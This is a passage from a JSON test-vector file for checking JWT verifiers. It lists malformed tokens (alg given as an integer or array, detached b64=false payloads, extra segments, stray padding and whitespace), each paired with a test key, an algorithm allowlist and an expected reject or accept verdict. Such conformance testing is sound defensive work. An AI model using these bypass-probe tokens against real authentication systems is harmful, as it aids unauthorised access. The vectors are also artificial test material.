      "HS256"
699
    ],
700
    "expected_unanimous": "reject",
701
    "notes": "header JSON contains a /* */ comment"
702
  },
703
  {
704
    "id": "hdr-json-trailing-comma",
705
    "class": "header-quirk",
706
    "severity": "parser-quirk",
707
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsfQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.jsP37X4i22VBgomvkk-oJoHAjDYFvci3FGR-1wlko00",
708
    "key": "schism-secret",
709
    "algs": [
710
      "HS256"
711
    ],
712
    "expected_unanimous": "reject",
713
    "notes": "trailing comma in header JSON \u2014 strict reject, lenient accept"
714
  },
715
  {
716
    "id": "hdr-utf8-bom",
717
    "class": "header-quirk",
718
    "severity": "parser-quirk",
719
    "token": "77u_eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.Q8o0m9RRQtO72eEVrd67kjgoXD0Ge5kn0FZfZ0H8UxU",
720
    "key": "schism-secret",
721
    "algs": [
722
      "HS256"
723
    ],
724
    "expected_unanimous": "reject",
725
    "notes": "UTF-8 BOM at start of header JSON"
726
  },
727
  {
728
    "id": "hdr-alg-as-int",
729
    "class": "header-quirk",
730
    "severity": "bypass-risk",
731
    "token": "eyJhbGciOjI1NiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.kvV0TkAk8PIfN0nVW1KRCS5weV04iCWvWOUBgQvGwiY",
732
    "key": "schism-secret",
733
    "algs": [
734
      "HS256"
735
    ],
736
    "expected_unanimous": "reject",
737
    "notes": "alg=256 (int) \u2014 must reject (must be StringOrURI)"
738
  },
739
  {
740
    "id": "hdr-alg-as-array",
741
    "class": "header-quirk",
742
    "severity": "bypass-risk",
743
    "token": "eyJhbGciOlsiSFMyNTYiXSwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.pbdwn92y5rX2s0LV07jALnITO_bJw2JXfcFtRKIAKmM",
744
    "key": "schism-secret",
745
    "algs": [
746
      "HS256"
747
    ],
748
    "expected_unanimous": "reject",
749
    "notes": "alg=['HS256'] \u2014 must reject"
750
  },
751
  {
752
    "id": "fmt-trailing-dot",
753
    "class": "format",
754
    "severity": "parser-quirk",
755
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI.",
756
    "key": "schism-secret",
757
    "algs": [
758
      "HS256"
759
    ],
760
    "expected_unanimous": "reject",
761
    "notes": "trailing dot \u2014 fourth empty segment"
762
  },
763
  {
764
    "id": "fmt-five-segments",
765
    "class": "format",
766
    "severity": "parser-quirk",
767
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI.extra.junk",
768
    "key": "schism-secret",
769
    "algs": [
770
      "HS256"
771
    ],
772
    "expected_unanimous": "reject",
773
    "notes": "5-dot-separated segments (JWE-shape masquerade)"
774
  },
775
  {
776
    "id": "fmt-leading-ws",
777
    "class": "format",
778
    "severity": "parser-quirk",
779
    "token": " eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
780
    "key": "schism-secret",
781
    "algs": [
782
      "HS256"
783
    ],
784
    "expected_unanimous": "reject",
785
    "notes": "leading whitespace before token"
786
  },
787
  {
788
    "id": "fmt-trailing-ws",
789
    "class": "format",
790
    "severity": "parser-quirk",
791
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI ",
792
    "key": "schism-secret",
793
    "algs": [
794
      "HS256"
795
    ],
796
    "expected_unanimous": "reject",
797
    "notes": "trailing whitespace after token"
798
  },
799
  {
800
    "id": "fmt-double-slash",
801
    "class": "format",
802
    "severity": "parser-quirk",
803
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI//",
804
    "key": "schism-secret",
805
    "algs": [
806
      "HS256"
807
    ],
808
    "expected_unanimous": "reject",
809
    "notes": "trailing // \u2014 base64 padding chars"
810
  },
811
  {
812
    "id": "fmt-extra-padding",
813
    "class": "format",
814
    "severity": "parser-quirk",
815
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9=.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ=.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI=",
816
    "key": "schism-secret",
817
    "algs": [
818
      "HS256"
819
    ],
820
    "expected_unanimous": "reject",
821
    "notes": "explicit base64 padding on each segment"
822
  },
823
  {
824
    "id": "allow-empty",
825
    "class": "allowlist-edge",
826
    "severity": "bypass-risk",
827
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
828
    "key": "schism-secret",
829
    "algs": [],
830
    "expected_unanimous": "reject",
831
    "notes": "empty allowlist \u2014 must reject"
832
  },
833
  {
834
    "id": "allow-mismatch",
835
    "class": "allowlist-edge",
836
    "severity": "bypass-risk",
837
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
838
    "key": "schism-secret",
839
    "algs": [
840
      "RS256"
841
    ],
842
    "expected_unanimous": "reject",
843
    "notes": "token alg=HS256 but allowlist=[RS256]"
844
  },
845
  {
846
    "id": "allow-superset",
847
    "class": "allowlist-edge",
848
    "severity": "control",
849
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
850
    "key": "schism-secret",
851
    "algs": [
852
      "HS256",
853
      "RS256",
854
      "ES256"
855
    ],
856
    "expected_unanimous": "accept",
857
    "notes": "broad allowlist that includes token alg"
858
  },
859
  {
860
    "id": "b64-false-detached",
861
    "class": "b64-detached",
862
    "severity": "bypass-risk",
863
    "token": "eyJhbGciOiJIUzI1NiIsImI2NCI6ZmFsc2UsImNyaXQiOlsiYjY0Il19..1sHADtyPl7yIr9OszV1zvZi_rE2jrsTYe-0i1NwbE3I",
864
    "key": "schism-secret",
865
    "algs": [
866
      "HS256"
867
    ],
868
    "expected_unanimous": "reject",
869
    "notes": "RFC 7797 detached payload \u2014 most libs don't support; must reject"
870
  },
871
  {
872
    "id": "b64-false-no-crit",
873
    "class": "b64-detached",
874
    "severity": "bypass-risk",
875
    "token": "eyJhbGciOiJIUzI1NiIsImI2NCI6ZmFsc2V9..1sHADtyPl7yIr9OszV1zvZi_rE2jrsTYe-0i1NwbE3I",
876
    "key": "schism-secret",
877
    "algs": [
878
      "HS256"
879
    ],
880
    "expected_unanimous": "reject",
881
    "notes": "b64=false without crit \u2014 spec violation, must reject"
882
  }
883
]